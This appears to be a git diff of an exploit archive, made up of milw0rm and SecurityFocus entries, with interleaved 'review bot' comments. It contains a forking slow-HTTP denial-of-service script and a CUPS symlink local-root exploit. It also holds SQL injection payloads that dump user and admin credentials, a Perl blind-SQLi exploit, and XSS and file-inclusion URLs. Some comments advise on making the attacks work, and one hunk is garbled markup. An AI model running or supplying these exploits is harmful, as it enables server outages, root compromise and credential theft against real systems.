@@ -1,94 +1,94 @@ - \n"; - die(); -} - -/** - * Hangs the connection to the webserver - * - * @param $server string - * @return void - */ -function killTheFucker($server) -{ - $request = "GET / HTTP/1.1\r\n"; - $request .= "Host: {$server}\r\n"; - $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"; - $request .= "Content-Length: " . rand(1, 1000) . "\r\n"; - $request .= "X-a: " . rand(1, 10000) . "\r\n"; - - $sockfd = @fsockopen($server, 80, $errno, $errstr); - @fwrite($sockfd, $request); - - while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE) - { - sleep(15); - } - - -} - -/** - * main function - * @param $argc int - * @param $argv array - * @return void - */ -function main($argc, $argv) -{ - $status = 1; - - if ($argc < 3) - { - usage($argv); - } - - $pids = Array(); - - for ($i = 0; $i < $argv[1]; $i++) - { - $pid = pcntl_fork(); - - if ($pid == -1) - { - die("ERROR!@# YOU MADE BABY JESUS CRY"); - } - else if ($pid == 0) - { - killTheFucker($argv[2]); - exit(0); - } - else - { - $pids[] = $pid; - } - } - - foreach ($pids as $pid) - { - pcntl_waitpid($pid, $status); - } -} - -// fire everything up -main($argc, $argv); - -# milw0rm.com [2009-06-22] + \n"; + die(); +} + +/** + * Hangs the connection to the webserver + * + * @param $server string + * @return void + */ +function killTheFucker($server) +{ + $request = "GET / HTTP/1.1\r\n"; + $request .= "Host: {$server}\r\n"; + $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"; + $request .= "Content-Length: " . rand(1, 1000) . "\r\n"; + $request .= "X-a: " . rand(1, 10000) . "\r\n"; + + $sockfd = @fsockopen($server, 80, $errno, $errstr); + @fwrite($sockfd, $request); + + while((fwrite($sockfd, "X-c:" . rand(1, 10000) . 
"\r\n")) !== FALSE) + { + sleep(15); + } + + +} + +/** + * main function + * @param $argc int + * @param $argv array + * @return void + */ +function main($argc, $argv) +{ + $status = 1; + + if ($argc < 3) + { + usage($argv); + } + + $pids = Array(); + + for ($i = 0; $i < $argv[1]; $i++) + { + $pid = pcntl_fork(); + + if ($pid == -1) + { + die("ERROR!@# YOU MADE BABY JESUS CRY"); + } + else if ($pid == 0) + { + killTheFucker($argv[2]); + exit(0); + } + else + { + $pids[] = $pid; + } + } + + foreach ($pids as $pid) + { + pcntl_waitpid($pid, $status); + } +} + +// fire everything up +main($argc, $argv); + +# milw0rm.com [2009-06-22] diff --git a/platforms/multiple/local/7550.c b/platforms/multiple/local/7550.c index 58fbc7f19..8d2406bbd 100755 --- a/platforms/multiple/local/7550.c +++ b/platforms/multiple/local/7550.c 
@@ -1,102 +1,102 @@ -/* - * cve-2008-5377.c - * - * CUPS < 1.3.8-4 pstopdf filter exploit - * Jon Oberheide - * http://jon.oberheide.org - * - * Usage: - * - * $ gcc cve-2008-5377.c -o cve-2008-5377.c - * $ ./cve-2008-5377 - * $ id - * uid=0(root) gid=1000(vm) ... - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377 - * - * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via - * a symlink attack on the /tmp/pstopdf.log temporary file. - * - * Operation: - * - * The exploit creates and prints a malformed postscript document that will - * cause the CUPS pstopdf filter to write an error message out to its log - * file that contains the string /tmp/getuid.so. However, since we also - * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the - * error message and malicious shared library path will be appended to the - * ld.so.preload file, allowing us to elevate privileges to root. - * - * Note: - * - * This exploit only works under the (rare) conditions that cupsd executes - * external filters as a privileged user, a printer on the system uses the - * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload - * must be world readable. 
- */ - -#include -#include -#include -#include -#include -#include -#include - -int -main(void) -{ - int ret; - FILE *fp; - struct stat log; - - fp = fopen("/tmp/cve-2008-5377.ps", "w"); - if(!fp) { - printf("error: cannot open /tmp/cve-2008-5377.ps\n"); - goto cleanup; - } - fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n"); - fclose(fp); - - fp = fopen("/tmp/getuid.c", "w"); - if(!fp) { - printf("error: cannot open /tmp/getuid.c\n"); - goto cleanup; - } - fprintf(fp, "int getuid(){return 0;}\n"); - fclose(fp); - - ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so"); - if (WEXITSTATUS(ret) != 0) { - printf("error: cannot compile /tmp/getuid.c\n"); - goto cleanup; - } - - unlink("/tmp/pstopdf.log"); - ret = stat("/tmp/pstopdf.log", &log); - if (ret != -1) { - - printf("error: /tmp/pstopdf.log already exists\n"); - goto cleanup; - } - - ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log"); - if (ret == -1) { - printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n"); - goto cleanup; - } - - ret = system("lp < /tmp/cve-2008-5377.ps"); - if (WEXITSTATUS(ret) != 0) { - printf("error: could not print /tmp/cve-2008-5377.ps\n"); - goto cleanup; - } - -cleanup: - unlink("/tmp/cve-2008-5377.ps"); - unlink("/tmp/getuid.c"); - return 0; -} - -// milw0rm.com [2008-12-22] +/* + * cve-2008-5377.c + * + * CUPS < 1.3.8-4 pstopdf filter exploit + * Jon Oberheide + * http://jon.oberheide.org + * + * Usage: + * + * $ gcc cve-2008-5377.c -o cve-2008-5377.c + * $ ./cve-2008-5377 + * $ id + * uid=0(root) gid=1000(vm) ... + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377 + * + * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via + * a symlink attack on the /tmp/pstopdf.log temporary file. 
+ * + * Operation: + * + * The exploit creates and prints a malformed postscript document that will + * cause the CUPS pstopdf filter to write an error message out to its log + * file that contains the string /tmp/getuid.so. However, since we also + * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the + * error message and malicious shared library path will be appended to the + * ld.so.preload file, allowing us to elevate privileges to root. + * + * Note: + * + * This exploit only works under the (rare) conditions that cupsd executes + * external filters as a privileged user, a printer on the system uses the + * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload + * must be world readable. + */ + +#include +#include +#include +#include +#include +#include +#include + +int +main(void) +{ + int ret; + FILE *fp; + struct stat log; + + fp = fopen("/tmp/cve-2008-5377.ps", "w"); + if(!fp) { + printf("error: cannot open /tmp/cve-2008-5377.ps\n"); + goto cleanup; + } + fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n"); + fclose(fp); + + fp = fopen("/tmp/getuid.c", "w"); + if(!fp) { + printf("error: cannot open /tmp/getuid.c\n"); + goto cleanup; + } + fprintf(fp, "int getuid(){return 0;}\n"); + fclose(fp); + + ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so"); + if (WEXITSTATUS(ret) != 0) { + printf("error: cannot compile /tmp/getuid.c\n"); + goto cleanup; + } + + unlink("/tmp/pstopdf.log"); + ret = stat("/tmp/pstopdf.log", &log); + if (ret != -1) { + + printf("error: /tmp/pstopdf.log already exists\n"); + goto cleanup; + } + + ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log"); + if (ret == -1) { + printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n"); + goto cleanup; + } + + ret = system("lp < /tmp/cve-2008-5377.ps"); + if (WEXITSTATUS(ret) != 0) { + printf("error: could not print /tmp/cve-2008-5377.ps\n"); + goto cleanup; + } + +cleanup: + 
unlink("/tmp/cve-2008-5377.ps"); + unlink("/tmp/getuid.c"); + return 0; +} + +// milw0rm.com [2008-12-22] diff --git a/platforms/multiple/remote/33405.txt b/platforms/multiple/remote/33405.txt new file mode 100755 index 000000000..734361f76 --- /dev/null +++ b/platforms/multiple/remote/33405.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/37338/info + + +The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities. + +An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks. + +The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. + +Versions prior to the following are vulnerable: + +Network Management Card Firmware 3.7.2 +Network Management Card Firmware 5.1.1 + +http://www.example.com/Forms/login1?login_username= \ No newline at end of file diff --git a/platforms/multiple/webapps/14006.txt b/platforms/multiple/webapps/14006.txt deleted file mode 100755 index 499eafdd2..000000000 --- a/platforms/multiple/webapps/14006.txt +++ /dev/null 
@@ -1,17 +0,0 @@ -Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual -Apliance 5.0 -Internal Cybsec Advisory Id: 2010-0604 -Vulnerability Class: Local Privilege Escalation -Release Date: 22-06-2010 -Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected -Affected Platforms: Red Hat nash 5.1 -Local / Remote: Local -Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) -Researcher: Ivan Huertas -Vendor Status: Patched -Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf - -Vulnerability Description: -InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root. - -http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf \ No newline at end of file diff --git a/platforms/multiple/webapps/9827.py b/platforms/multiple/webapps/9827.py deleted file mode 100755 index 7c5463860..000000000 --- a/platforms/multiple/webapps/9827.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python -# -# html2ps <= 1.0 beta5 arbitrary file disclosure -# http://user.it.uu.se/~jan/html2ps.html -# author: epiphant -# -# the "include file" ssi directive doesn't check for directory -# traversal so you can include and disclose any file in the -# dir tree (very handy when html2ps is running as a part of a -# web app with data that you control) -# the vuln requires that "ssi" in the @html2ps block in the -# html2psrc file is set to 1, which is the default -# -# bonus info: some of the backtick operators look shady too -# but will require lots of prerequisites so they're uncool -# -# shouts: thcx labs, zybadawg333, fabiodds, str0ke -# jan k: shame on you - your perl is very ugly -# - -import os - -d = """\ - - -epiphant - - -

epiphant

- -

epiphant

-
-
-"""
-
-try:
- fi = open("epiphant.html", "w")
- fi.write(d)
- fi.close()
-except:
- print "can't write here"
- exit(1)
-
-os.system("html2ps epiphant.html > epiphant.ps")
-os.system("gv epiphant.ps")
-exit(0)
diff --git a/platforms/php/remote/33414.php b/platforms/php/remote/33414.php
new file mode 100755
index 000000000..d576cb00f
--- /dev/null
+++ b/platforms/php/remote/33414.php
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/37389/info
+
+PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
+
+Versions prior to PHP 5.2.12 are vulnerable.
+
+// overlong UTF-8 sequence
+echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
+// invalid Shift_JIS sequence
+echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
+echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
+// invalid EUC-JP sequence
+echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
+echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
+echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
+echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
diff --git a/platforms/php/remote/33415.php b/platforms/php/remote/33415.php
new file mode 100755
index 000000000..48753e88a
--- /dev/null
+++ b/platforms/php/remote/33415.php
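Review bot: The 33414.php hunk commits the test as a `.php` file, but the `echo htmlspecialchars(...)` lines are preceded by advisory prose and there is no `<?php` open tag, so running the file prints the prose and the code verbatim instead of exercising `htmlspecialchars`. Insert `<?php` immediately before the `// overlong UTF-8 sequence` comment (the prose above it can stay as plain text, which the interpreter then emits as-is, or be moved into a `/* ... */` block after the tag). The entry also never says what a vulnerable versus a fixed build prints for each case; since the point is whether the malformed lead bytes survive into the output, a comment recommending `php 33414.php | xxd` and stating the expected bytes per case would make the result checkable rather than eyeballed.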
@@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/37389/info + +PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. + +Versions prior to PHP 5.2.12 are vulnerable. + + ? " +< html > +< head >< title > Shift_JIS test Shift_JIS test </ title> </ head> +< body > <Body> +< p >< a <P> <a title = " <?php echo htmlspecialchars ( $ _GET [ ' a1 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " title = "<? php echo htmlspecialchars ($ _GET [ 'a1'], ENT_QUOTES, 'SJIS')?>" href = " <?php echo htmlspecialchars ( $ _GET [ ' a2 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " > test </ a ></ p > href = "<? php echo htmlspecialchars ($ _GET [ 'a2'], ENT_QUOTES, 'SJIS')?>"> test </ a> </ p> +</ body > </ Body> +</ html > </ Html> diff --git a/platforms/php/webapps/23697.txt b/platforms/php/webapps/23697.txt index dc6cf99a7..c76a8766b 100755 --- a/platforms/php/webapps/23697.txt +++ b/platforms/php/webapps/23697.txt @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/9664/info -Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. +Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call. This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well. 
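Review bot: The markup at the end of the 33415.php hunk is garbled — tag names and PHP tokens are split by spaces (`< html >`, `<? php`, `$ _GET [ ' a1 ' ]`) and every line appears twice with differing capitalisation — so the file neither parses as PHP nor renders as HTML, and the leading ` ? "` line is unrecoverable (it looks like a truncated PHP prologue, but that is a guess). The recoverable intent is a page that reflects `$_GET['a1']` and `$_GET['a2']` into attribute values through `htmlspecialchars(..., ENT_QUOTES, 'SJIS')`; the excerpt below rebuilds just that from the visible tokens. Because the test only shows anything when the browser decodes the response as Shift_JIS, the entry should also state that a matching `Content-Type` charset (header or `<meta>`) is a prerequisite — nothing in the hunk sets one.
```php
<!-- … unchanged: advisory prose lines above … -->
<html>
<head><title>Shift_JIS test</title></head>
<body>
<p><a title="<?php echo htmlspecialchars($_GET['a1'], ENT_QUOTES, 'SJIS') ?>" href="<?php echo htmlspecialchars($_GET['a2'], ENT_QUOTES, 'SJIS') ?>">test</a></p>
</body>
</html>
```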
diff --git a/platforms/php/webapps/33401.txt b/platforms/php/webapps/33401.txt
new file mode 100755
index 000000000..18257fe01
--- /dev/null
+++ b/platforms/php/webapps/33401.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37315/info
+
+Million Pixel Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions may also be affected.
+
+
+The following example URI is available:
+
+http://www.example.com/?pa=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/33404.txt b/platforms/php/webapps/33404.txt
new file mode 100755
index 000000000..0060fe05d
--- /dev/null
+++ b/platforms/php/webapps/33404.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37329/info
+
+phpFaber CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example is available:
+
+http://www.example.com/module.php?mod=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/33406.txt b/platforms/php/webapps/33406.txt
new file mode 100755
index 000000000..943a0c4b0
--- /dev/null
+++ b/platforms/php/webapps/33406.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37351/info
+
+Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects versions prior to Horde 3.3.6.
+
+Note that additional products that use the Horde framework may also be vulnerable.
+
+http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
\ No newline at end of file
diff --git a/platforms/php/webapps/33407.txt b/platforms/php/webapps/33407.txt
new file mode 100755
index 000000000..9a1c85415
--- /dev/null
+++ b/platforms/php/webapps/33407.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37351/info
+
+Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects versions prior to Horde 3.3.6.
+
+Note that additional products that use the Horde framework may also be vulnerable.
+
+http://www.example.com/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
\ No newline at end of file
diff --git a/platforms/php/webapps/33408.txt b/platforms/php/webapps/33408.txt
new file mode 100755
index 000000000..81d716a81
--- /dev/null
+++ b/platforms/php/webapps/33408.txt
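Review bot: The 33406.txt PoC targets `admin/phpshell.php` and carries a `Horde=<sessid>` session parameter, which implies the payload is only reflected to an already-authenticated administrator, yet the entry never states the privilege required — the impact (an admin following a crafted link while logged in) is narrower than the generic unauthenticated reflected-XSS wording suggests. Add a line such as `Exploitation requires a valid Horde administrator session; the payload is supplied in the extra path segment after phpshell.php/ (presumably PATH_INFO), not in a query parameter.` Naming the injection point explicitly matters for defenders, who tend to grep logs for `?param=`-style vectors and would miss a path-segment one; the same wording applies to the cmdshell.php and sqlshell.php siblings.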
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37351/info
+
+Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects versions prior to Horde 3.3.6.
+
+Note that additional products that use the Horde framework may also be vulnerable.
+
+http://www.example.com/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
\ No newline at end of file
diff --git a/platforms/php/webapps/33409.txt b/platforms/php/webapps/33409.txt
new file mode 100755
index 000000000..759485507
--- /dev/null
+++ b/platforms/php/webapps/33409.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37356/info
+
+Article Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example is available:
+
+Username : X' or ' 1=1
+Password : X' or ' 1=1
\ No newline at end of file
diff --git a/platforms/php/webapps/33410.txt b/platforms/php/webapps/33410.txt
new file mode 100755
index 000000000..4313c278e
--- /dev/null
+++ b/platforms/php/webapps/33410.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37371/info
+
+The Sections module for Drupal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+To exploit this issue, the attacker must have 'administer sections' permissions.
+
+Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable.
+
+The following example input is available:
+
+<script>alert('xss');</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/33411.txt b/platforms/php/webapps/33411.txt
new file mode 100755
index 000000000..1203996f6
--- /dev/null
+++ b/platforms/php/webapps/33411.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37380/info
+
+iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+iSupport 1.8 and prior versions are vulnerable.
+
+http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33412.txt b/platforms/php/webapps/33412.txt
new file mode 100755
index 000000000..24f36317d
--- /dev/null
+++ b/platforms/php/webapps/33412.txt
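Review bot: The example URI in the 33411.txt hunk, `http://www.example.comhelpdesk/function.php?which=...`, is missing the `/` between host and path, so copying it yields a request to a non-existent host `www.example.comhelpdesk` rather than the vulnerable script. It should read `http://www.example.com/helpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E`, matching the `/helpdesk/` prefix the companion 33412.txt entry already uses for index.php.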
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37380/info
+
+iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+iSupport 1.8 and prior versions are vulnerable.
+
+http://www.example.com/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33413.txt b/platforms/php/webapps/33413.txt
new file mode 100755
index 000000000..c626149ef
--- /dev/null
+++ b/platforms/php/webapps/33413.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37384/info
+
+Pluxml-Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Pluxml-Blog 4.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/core/admin/auth.php?p=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/33416.txt b/platforms/php/webapps/33416.txt
new file mode 100755
index 000000000..175ccfc9a
--- /dev/null
+++ b/platforms/php/webapps/33416.txt
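Review bot: The 33413.txt PoC `auth.php?p=1">` stops right after the attribute break-out, so the script payload that must follow is missing — most likely stripped as HTML when the entry was imported, which the Horde entries in this same commit avoid by percent-encoding their payloads. As committed the entry demonstrates only that `p` lands inside an attribute, not script execution. Record it encoded so it survives text processing, e.g. `http://www.example.com/[path]/core/admin/auth.php?p=1%22%3E[XSS]`, using the `[XSS]` placeholder the other entries use.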
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37393/info
+
+QuiXplorer is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/?lang=../path/to/malicious_uploaded_code
\ No newline at end of file
diff --git a/platforms/php/webapps/33417.txt b/platforms/php/webapps/33417.txt
new file mode 100755
index 000000000..bc9dd4df0
--- /dev/null
+++ b/platforms/php/webapps/33417.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37394/info
+
+cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+cPanel versions prior to 11.25.0 are affected.
+
+
+http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
+
+http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO
\ No newline at end of file
diff --git a/platforms/php/webapps/33418.txt b/platforms/php/webapps/33418.txt
new file mode 100755
index 000000000..0c5354fb0
--- /dev/null
+++ b/platforms/php/webapps/33418.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37403/info
+
+The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/
\ No newline at end of file
diff --git a/platforms/php/webapps/33419.txt b/platforms/php/webapps/33419.txt
new file mode 100755
index 000000000..3e0acb46f
--- /dev/null
+++ b/platforms/php/webapps/33419.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37408/info
+
+F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+F3Site 2009 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mod/poll.php?GLOBALS[nlang]=[LFI%00]
\ No newline at end of file
diff --git a/platforms/php/webapps/33420.txt b/platforms/php/webapps/33420.txt
new file mode 100755
index 000000000..c4597bfed
--- /dev/null
+++ b/platforms/php/webapps/33420.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37408/info
+
+F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+F3Site 2009 is vulnerable; other versions may also be affected.
+
+http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00]
\ No newline at end of file
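Review bot: The UNION in the 33418.txt PoC hardcodes two installation-specific details without saying so: a two-column select list (`concat(username,0x3a,password),user()`) that has to match the column count of the original `secid` query, and the default `jos_` table prefix in `jos_users`; on a site with a custom prefix or a different column count the request errors out instead of returning credentials. Add a line such as `Adjust the column count and the jos_ table prefix to the target installation.` The entry also names no affected version of com_joomportfolio at all, unlike its siblings in this commit, which should be recorded or explicitly marked unknown.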
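Review bot: The 33419.txt vector `poll.php?GLOBALS[nlang]=[LFI%00]` overwrites `$GLOBALS['nlang']` from the query string, which, as far as the entry shows, can only work when PHP's `register_globals` is enabled, and the trailing `%00` relies on a null byte truncating the include path — both are PHP-configuration prerequisites the entry leaves unstated, and both decide whether a given F3Site 2009 install is actually exploitable. Add `Requires register_globals=On; the %00 terminator depends on the PHP build accepting null bytes in include paths.` The same note applies verbatim to the companion 33420.txt entry for new.php.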
diff --git a/platforms/php/webapps/3408.pl b/platforms/php/webapps/3408.pl index c7292eb1c..de520f9c1 100755 --- a/platforms/php/webapps/3408.pl +++ b/platforms/php/webapps/3408.pl 
@@ -1,84 +1,84 @@ -#!/usr/bin/perl -#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit -#[Coded by : ajann -#[Author : ajann -#[Contact : :( -#[S.Page : http://www.ajsquare.com -#[Dork : "/subcat.php?cate_id=" -#[$$ : 250.00 USD -#[.. : ajann,Turkey - -use IO::Socket; -if(@ARGV < 1){ -print " -[======================================================================== -[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit -[// Usage: exploit.pl [target] -[// Example: exploit.pl victim.com -[// Example: exploit.pl victim.com -[// Vuln&Exp : ajann -[======================================================================== -"; -exit(); -} -#Local variables -$server = $ARGV[0]; -$server =~ s/(http:\/\/)//eg; -$host = "http://".$server; -$port = "80"; -$file = "/subcat.php?cate_id="; - -print "Script <DIR> : "; -$dir = <STDIN>; -chop ($dir); - -if ($dir =~ /exit/){ -print "-- Exploit Failed[You Are Exited] \n"; -exit(); -} - -if ($dir =~ /\//){} -else { -print "-- Exploit Failed[No DIR] \n"; -exit(); - } - - -$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list"; -$target = $host.$dir.$file.$target; - -#Writing data to socket -print "+**********************************************************************+\n"; -print "+ Trying to connect: $server\n"; -$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; -print $socket "GET $target HTTP/1.1\n"; -print $socket "Host: $server\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; -print "+ Connected!...\n"; 